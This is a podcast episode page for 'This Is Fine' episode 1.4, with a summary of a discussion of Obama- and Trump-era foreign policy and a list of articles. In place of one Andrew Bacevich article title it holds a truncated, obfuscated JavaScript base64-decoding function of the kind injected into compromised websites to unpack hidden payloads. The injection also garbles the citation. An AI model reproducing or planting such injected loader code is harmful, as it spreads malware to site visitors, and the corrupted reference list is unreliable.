Episode 1.4: No State Solution
Welcome to This Is Fine, episode 1.4, no state solution Thank you very much for listening, Finers. Please subscribe to the podcast on iTunes or your favorite app, and share this link with your adult children and child-like adult acquaintances.
In this week’s podcast, we look at foreign policy in the Obama and Trump eras, asking whether Obama really constitutes a break from previous presidencies, when intervention might be justified, how much disruption we can expect from Trump, and whether there's any hope for Israel.
We'll return in two weeks with This is Fine, episode 1.5, on the genealogy of elites, where we'll discuss elitism and expertise.
Please send us listener questions or complaints (and guest requests) for This is Fine. Have a terrifying inauguration and for those of you marching in protest, godspeed.
Articles discussed in this episode:
* Jeffrey Goldberg, "The Obama Doctrine", The Atlantic
* David Samuels, "The Aspiring Novelist Who Became Obama's Foreign Policy Guru", The New York Times
* Andrew Bacevich, "function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6
et cetera:
* Thomas Meaney, "So it Must Be Forever," London Review of Books
* Perry Anderson, American Foreign Policy and its Thinkers
* Andrew Bacevich, America's War for the Greater Middle East